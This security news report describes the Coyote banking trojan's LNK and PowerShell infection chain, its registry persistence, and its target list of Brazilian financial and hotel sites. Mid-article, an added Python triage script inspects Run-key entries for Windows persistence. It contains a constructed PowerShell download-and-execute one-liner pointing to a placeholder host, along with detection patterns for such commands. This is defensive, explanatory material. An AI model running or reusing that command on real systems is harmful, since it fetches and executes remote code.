Coyote Malware Targets Over 1,000 Sites and 73 Financial Institutions

A new wave of cyber threats is sweeping through Brazil, with the emergence of a banking malware known as Coyote. This malware specifically targets Windows users and can execute various malicious activities, including keylogging, capturing screenshots, and deploying phishing overlays to steal sensitive user credentials.

Delivery Method

Recent analysis by Fortinet’s FortiGuard Labs, conducted by researcher Cara Lin, reveals that attackers deliver Coyote through Windows Shortcut (LNK) file artifacts. These files utilize PowerShell commands to initiate the malware. Kaspersky first documented Coyote in early 2024, noting its focus on South American users and its ability to extract sensitive information from over 70 financial applications.

The infection begins when an LNK file executes a PowerShell command to fetch the next stage of the attack from a remote server, specifically “tbet.geontrigame.’com’.” This command triggers another PowerShell script that launches a loader, which then executes the Coyote payload. The injected code uses Donut, a tool that decrypts and executes the final Microsoft Intermediate Language (MSIL) payloads.

Establishing Persistence

Once activated, Coyote modifies the Windows registry at ‘HKCU\Software\Microsoft\Windows\CurrentVersion\Run’ to establish persistence. If the malware finds an existing entry, it removes it and creates a new one with a randomly generated name. This entry contains a PowerShell command that downloads and executes a Base64-encoded URL, enabling the core functions of the Coyote banking trojan.
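The persistence pattern above (a randomly named Run value that launches PowerShell with a Base64-hidden download URL) is something a defender can triage from an export of the Run key. The following is an added example, not code from the article or from FortiGuard Labs: it takes Run values as a name-to-command mapping (the sample entries and the placeholder URL are constructed, not real Coyote indicators), flags PowerShell commands that carry encoded data or a download-and-execute primitive, and decodes Base64 runs so the hidden URL surfaces in the finding.

```python
import base64
import re

# Constructed sample of HKCU\...\Run values; the encoded URL is a placeholder, not a real indicator.
STAGE_URL = "https://example.invalid/stage2.ps1"
SAMPLE_RUN_ENTRIES = {
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "xq8f2lk": (  # random-looking name plus a PowerShell one-liner, as the article describes
        "powershell.exe -w hidden -nop -c \"iex ((New-Object Net.WebClient).DownloadString("
        "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
        + base64.b64encode(STAGE_URL.encode()).decode() + "'))))\""
    ),
}

B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")          # long Base64-looking runs
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression")

def decoded_blobs(cmd):
    """Yield decodings of each Base64-looking run in cmd, as UTF-8 and as UTF-16LE (what -EncodedCommand uses)."""
    for m in B64_RE.finditer(cmd):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # not valid Base64 (binascii.Error subclasses ValueError)
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                yield raw.decode(enc)
            except UnicodeDecodeError:
                pass

def analyze_run_entries(entries):
    """Return findings for Run values that launch PowerShell with encoded data or a download/execute primitive."""
    findings = []
    for name, cmd in entries.items():
        low = cmd.lower()
        if "powershell" not in low and "pwsh" not in low:
            continue  # only PowerShell launchers are in scope for this heuristic
        reasons = []
        if re.search(r"-enc|-e\b|frombase64string", low):
            reasons.append("base64 payload")
        if DOWNLOAD_RE.search(low):
            reasons.append("download/execute primitive")
        texts = [cmd, *decoded_blobs(cmd)]  # URLs hidden inside Base64 surface here
        urls = sorted({u for t in texts for u in URL_RE.findall(t)})
        if reasons or urls:
            findings.append({"name": name, "reasons": reasons, "urls": urls})
    return findings
```

On a live Windows host the same mapping can be built by enumerating the Run key with the standard `winreg` module; the analysis itself does not depend on the platform.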

After execution, Coyote gathers essential system information and compiles a list of installed antivirus products on the infected machine. It Base64-encodes this data and sends it to a remote server. The malware also employs various checks to evade detection by sandboxes and virtual environments.

Expanded Target List

A significant update in the latest version of Coyote is its expanded target list, which now includes 1,030 websites and 73 financial institutions. Notable targets include mercadobitcoin.com.br, bitcointrade.com.br, foxbit.com.br, augustoshotel.com.br, blumenhotelboutique.com.br, and fallshotel.com.br.

Malicious Actions

If a victim attempts to access any of the compromised sites, Coyote communicates with an attacker-controlled server to determine the next steps. These steps may involve capturing screenshots or displaying phishing overlays. The malware can also activate a keylogger and manipulate display settings to further compromise the victim’s security.

Conclusion

“Coyote’s infection process is intricate and multi-layered,” Lin stated. “This attack utilizes an LNK file for initial access, leading to the discovery of additional malicious files. The Trojan represents a significant threat to financial cybersecurity, especially given its potential to extend beyond its initial targets.”
